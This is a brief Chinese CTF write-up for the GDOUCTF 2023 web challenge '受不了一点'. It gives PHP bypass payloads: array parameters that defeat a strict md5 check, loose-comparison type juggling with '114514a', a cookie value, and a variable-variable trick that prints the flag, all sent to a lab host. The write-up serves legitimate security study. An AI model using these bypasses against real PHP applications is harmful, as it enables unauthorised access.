[GDOUCTF 2023]受不了一点

[GDOUCTF 2023]受不了一点

进入靶场：

第一个if

if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];

就是让你给参数ctf，gdou,POST赋值

第二个if

关于md5强比较
直接使用数组类型绕过
即ctf[]=1&gdou[]=2

第三-四个if

传入cookie使cookie的值等于j0k3r
cookie=j0k3r

第五个if

让get方式传入参数aaa和bbb的值
传就行了

第六个if

if($aaa==114514 && $bbb==114514 && $aaa!=$bbb)
这里进行绕过，在任意一个114514后加一个字母
传参aaa=114514&bbb=114514a

第七个if

这里选择任意一个传入flag的方式
使用get，则flag的值在不断的遍历，对flag的值进行传递，输出flag
构造：123=flag&flag=123

最后的payload

http://node2.anna.nssctf.cn:28517/?aaa=114514&bbb=114514a&123=flag&flag=123

post传参：ctf[]=1&gdou[]=2

设置cookie:cookie=j0k3r